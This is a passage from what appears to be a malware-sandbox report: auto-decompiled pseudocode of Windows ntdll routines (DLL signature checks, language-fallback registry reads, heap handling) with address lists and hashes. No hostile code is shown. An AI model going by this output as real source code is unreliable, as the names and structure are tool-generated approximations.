					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0176C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1855780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E017E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1855780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01787D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01787D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E017E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01787D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01787D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E017E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0179A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0176B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                              0x01777e4c
                                                                              0x01777e50
                                                                              0x01777e55
                                                                              0x01777e58
                                                                              0x01777e5d
                                                                              0x01777e71
                                                                              0x01777f33
                                                                              0x01777e77
                                                                              0x01777e77
                                                                              0x01777e79
                                                                              0x01777e79
                                                                              0x01777e7e
                                                                              0x01777f45
                                                                              0x017c9848
                                                                              0x00000000
                                                                              0x017c9848
                                                                              0x01777f4e
                                                                              0x01777f53
                                                                              0x01777f5a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c985a
                                                                              0x017c9862
                                                                              0x017c9866
                                                                              0x00000000
                                                                              0x017c986c
                                                                              0x00000000
                                                                              0x017c986c
                                                                              0x01777e84
                                                                              0x01777e84
                                                                              0x01777e8d
                                                                              0x017c9871
                                                                              0x01777eb8
                                                                              0x01777ec0
                                                                              0x01777ec0
                                                                              0x01777e9a
                                                                              0x017c987e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c9884
                                                                              0x017c988b
                                                                              0x017c98a7
                                                                              0x017c98ac
                                                                              0x017c98b1
                                                                              0x017c98b6
                                                                              0x017c98b8
                                                                              0x017c98b8
                                                                              0x017c98b9
                                                                              0x00000000
                                                                              0x017c98b9
                                                                              0x01777ea0
                                                                              0x01777ea7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01777eac
                                                                              0x01777eb1
                                                                              0x01777ec6
                                                                              0x01777ed0
                                                                              0x017c98cc
                                                                              0x01777ed6
                                                                              0x01777ed6
                                                                              0x01777ed6
                                                                              0x01777ede
                                                                              0x01777ee3
                                                                              0x017c98e3
                                                                              0x017c98f0
                                                                              0x017c9902
                                                                              0x017c98f2
                                                                              0x017c98fb
                                                                              0x017c98fb
                                                                              0x017c9907
                                                                              0x017c991d
                                                                              0x017c991d
                                                                              0x017c9907
                                                                              0x017c98e3
                                                                              0x01777ef0
                                                                              0x01777f14
                                                                              0x01777f14
                                                                              0x01777f1e
                                                                              0x017c9946
                                                                              0x01777f24
                                                                              0x01777f24
                                                                              0x01777f24
                                                                              0x01777f2c
                                                                              0x017c996a
                                                                              0x017c9975
                                                                              0x017c9975
                                                                              0x017c997e
                                                                              0x017c9993
                                                                              0x017c9993
                                                                              0x017c997e
                                                                              0x00000000
                                                                              0x01777ef2
                                                                              0x01777efc
                                                                              0x01777f0a
                                                                              0x01777f0e
                                                                              0x017c9933
                                                                              0x00000000
                                                                              0x017c9933
                                                                              0x00000000
                                                                              0x01777f0e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01777eb1

                                                                              Strings
                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 017C98A2
                                                                              • LdrpCompleteMapModule, xrefs: 017C9898
                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 017C9891
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                              • API String ID: 0-1676968949
                                                                              • Opcode ID: 54d39ff2acd28cab6b7837004f0007e6a3b0f7e3e4a25dc9b9a318680db0ac1b
                                                                              • Instruction ID: 17608856bbd23636b1b89a302d1d57ecad88384253e1b6e67b8f034bf3b2a7f1
                                                                              • Opcode Fuzzy Hash: 54d39ff2acd28cab6b7837004f0007e6a3b0f7e3e4a25dc9b9a318680db0ac1b
                                                                              • Instruction Fuzzy Hash: B1510331600741DBEB2ACB6CC948B6AFBE4AB49714F140AADEA519B3E1D7B4ED00C750
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E0176E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0176F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E017A95D0();
						}
						if(_t78 != 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E017AFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E017ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E017A9600();
					if(_t97 < 0) {
						goto L6;
					}
					E017ABB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0176F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E017ABB40(_t83, _t102 + 0x24, _t78);
								if(L017743C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E017ABB40(_t84, _t102 + 0x24, _t94);
									if(L017743C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                              0x0176e620
                                                                              0x0176e628
                                                                              0x0176e62f
                                                                              0x0176e631
                                                                              0x0176e635
                                                                              0x0176e637
                                                                              0x0176e63e
                                                                              0x017c5503
                                                                              0x017c5503
                                                                              0x0176e64c
                                                                              0x0176e64c
                                                                              0x0176e651
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0176e661
                                                                              0x0176e665
                                                                              0x017c542a
                                                                              0x0176e715
                                                                              0x0176e71a
                                                                              0x0176e71c
                                                                              0x0176e720
                                                                              0x0176e720
                                                                              0x0176e727
                                                                              0x0176e736
                                                                              0x0176e736
                                                                              0x0176e743
                                                                              0x0176e743
                                                                              0x0176e673
                                                                              0x0176e678
                                                                              0x0176e67d
                                                                              0x0176e682
                                                                              0x0176e685
                                                                              0x0176e692
                                                                              0x0176e69b
                                                                              0x0176e6a3
                                                                              0x0176e6ad
                                                                              0x0176e6b1
                                                                              0x0176e6b2
                                                                              0x0176e6bb
                                                                              0x0176e6bf
                                                                              0x0176e6c0
                                                                              0x0176e6c8
                                                                              0x0176e6cc
                                                                              0x0176e6d5
                                                                              0x0176e6d9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0176e6e5
                                                                              0x0176e6ea
                                                                              0x0176e6f9
                                                                              0x0176e70b
                                                                              0x0176e70f
                                                                              0x017c5439
                                                                              0x017c545e
                                                                              0x017c545e
                                                                              0x00000000
                                                                              0x017c545e
                                                                              0x017c543b
                                                                              0x017c543e
                                                                              0x017c5440
                                                                              0x017c5445
                                                                              0x017c5472
                                                                              0x017c5475
                                                                              0x017c548d
                                                                              0x017c5493
                                                                              0x017c54a9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c54ab
                                                                              0x017c54b4
                                                                              0x017c54bc
                                                                              0x017c54c8
                                                                              0x017c54de
                                                                              0x017c54fb
                                                                              0x017c54e0
                                                                              0x017c54e6
                                                                              0x017c54eb
                                                                              0x017c54eb
                                                                              0x017c54de
                                                                              0x00000000
                                                                              0x017c54bc
                                                                              0x017c5477
                                                                              0x017c547a
                                                                              0x017c5480
                                                                              0x017c5483
                                                                              0x017c5486
                                                                              0x017c548b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c548b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c5447
                                                                              0x017c5447
                                                                              0x017c5447
                                                                              0x017c5447
                                                                              0x017c544e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c5450
                                                                              0x017c5452
                                                                              0x017c5455
                                                                              0x017c545a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c545c
                                                                              0x017c546a
                                                                              0x017c546d
                                                                              0x017c546f
                                                                              0x00000000
                                                                              0x017c546f
                                                                              0x0176e70f

                                                                              Strings
                                                                              • InstallLanguageFallback, xrefs: 0176E6DB
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0176E68C
                                                                              • @, xrefs: 0176E6C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                              • API String ID: 0-1757540487
                                                                              • Opcode ID: e6d3b437b3c0103b9bca3e622c610e25397b271494f9490d2ec6b12fa1d36c2e
                                                                              • Instruction ID: 0444de500ea58b39e8c3123ab5b9d6ae1ea05353655c16216fa04857b6fc3b09
                                                                              • Opcode Fuzzy Hash: e6d3b437b3c0103b9bca3e622c610e25397b271494f9490d2ec6b12fa1d36c2e
                                                                              • Instruction Fuzzy Hash: 8051E5766083069BD711DF28D444AABF7E8BF88B14F45096EF985D7240FB35EA04C7A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0182E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 60%
                                                                              			E0182E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0182BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0182BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0182AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E017A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0182A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0182A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E017A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0182A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0182A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01782280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0177B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0177FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01787D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0181FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                              0x0182e547
                                                                              0x0182e549
                                                                              0x0182e54f
                                                                              0x0182e553
                                                                              0x0182e557
                                                                              0x0182e55a
                                                                              0x0182e55c
                                                                              0x0182e55f
                                                                              0x0182e561
                                                                              0x0182e567
                                                                              0x0182e56b
                                                                              0x0182e7e2
                                                                              0x00000000
                                                                              0x0182e571
                                                                              0x0182e575
                                                                              0x0182e577
                                                                              0x0182e57b
                                                                              0x0182e57c
                                                                              0x0182e57d
                                                                              0x0182e57e
                                                                              0x0182e57f
                                                                              0x0182e588
                                                                              0x0182e58f
                                                                              0x0182e591
                                                                              0x0182e592
                                                                              0x0182e592
                                                                              0x0182e596
                                                                              0x0182e59e
                                                                              0x0182e5a0
                                                                              0x0182e5a6
                                                                              0x0182e61d
                                                                              0x0182e61d
                                                                              0x0182e621
                                                                              0x0182e623
                                                                              0x0182e630
                                                                              0x0182e630
                                                                              0x0182e7e6
                                                                              0x0182e7eb
                                                                              0x0182e7ed
                                                                              0x0182e7f4
                                                                              0x0182e7fa
                                                                              0x0182e7ff
                                                                              0x0182e7ff
                                                                              0x0182e80a
                                                                              0x0182e812
                                                                              0x0182e812
                                                                              0x0182e5ab
                                                                              0x0182e5b4
                                                                              0x0182e5b9
                                                                              0x0182e5be
                                                                              0x0182e5c0
                                                                              0x0182e5c2
                                                                              0x0182e5c8
                                                                              0x0182e5c9
                                                                              0x0182e5cb
                                                                              0x0182e5cc
                                                                              0x0182e5d5
                                                                              0x0182e5e4
                                                                              0x0182e5f1
                                                                              0x0182e5f8
                                                                              0x0182e5f8
                                                                              0x0182e5d5
                                                                              0x0182e602
                                                                              0x0182e616
                                                                              0x0182e63d
                                                                              0x0182e644
                                                                              0x0182e64d
                                                                              0x0182e652
                                                                              0x0182e657
                                                                              0x0182e659
                                                                              0x0182e65b
                                                                              0x0182e661
                                                                              0x0182e662
                                                                              0x0182e664
                                                                              0x0182e665
                                                                              0x0182e66e
                                                                              0x0182e67d
                                                                              0x0182e68a
                                                                              0x0182e691
                                                                              0x0182e691
                                                                              0x0182e66e
                                                                              0x0182e6b0
                                                                              0x00000000
                                                                              0x0182e6b6
                                                                              0x0182e6bd
                                                                              0x0182e6c7
                                                                              0x0182e6d7
                                                                              0x0182e6d9
                                                                              0x0182e6db
                                                                              0x0182e6de
                                                                              0x0182e6e3
                                                                              0x0182e6f3
                                                                              0x0182e6fc
                                                                              0x0182e700
                                                                              0x0182e700
                                                                              0x0182e704
                                                                              0x0182e70a
                                                                              0x0182e70a
                                                                              0x0182e713
                                                                              0x0182e716
                                                                              0x0182e719
                                                                              0x0182e720
                                                                              0x0182e761
                                                                              0x0182e76b
                                                                              0x0182e774
                                                                              0x0182e77a
                                                                              0x0182e77a
                                                                              0x0182e78a
                                                                              0x0182e791
                                                                              0x0182e799
                                                                              0x0182e79b
                                                                              0x0182e79f
                                                                              0x0182e7aa
                                                                              0x0182e7c0
                                                                              0x0182e7ac
                                                                              0x0182e7b2
                                                                              0x0182e7b9
                                                                              0x0182e7b9
                                                                              0x0182e7c7
                                                                              0x0182e806
                                                                              0x00000000
                                                                              0x0182e7c9
                                                                              0x0182e7d1
                                                                              0x0182e7d8
                                                                              0x00000000
                                                                              0x0182e7d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182e722
                                                                              0x0182e72e
                                                                              0x0182e748
                                                                              0x0182e74c
                                                                              0x0182e754
                                                                              0x0182e756
                                                                              0x0182e75c
                                                                              0x0182e75c
                                                                              0x00000000
                                                                              0x0182e75c
                                                                              0x0182e758
                                                                              0x0182e758
                                                                              0x00000000
                                                                              0x0182e758
                                                                              0x0182e750
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182e752
                                                                              0x00000000
                                                                              0x0182e752
                                                                              0x0182e730
                                                                              0x0182e735
                                                                              0x0182e73d
                                                                              0x0182e73f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182e741
                                                                              0x0182e741
                                                                              0x00000000
                                                                              0x0182e741
                                                                              0x0182e739
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182e73b
                                                                              0x00000000
                                                                              0x0182e73b
                                                                              0x0182e722
                                                                              0x0182e720
                                                                              0x0182e6b0
                                                                              0x0182e618
                                                                              0x00000000
                                                                              0x0182e618

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                              • Instruction ID: bf347c4f3a11a8a39a51608b3921e6e34e41193dd9963a13012bca6e35eba936
                                                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                              • Instruction Fuzzy Hash: B291C2312043529FE726CE29C940B17BBE5FF84714F14892DFA95CB280E774EA44CB56
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 77%
                                                                              			E017E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18405f0);
				E017BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0177EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E017E53CA(0);
						return E017BD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E017AF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01783690(1, _t117, 0x1741810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E017AAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01784620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E017AAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E017E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E017A9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
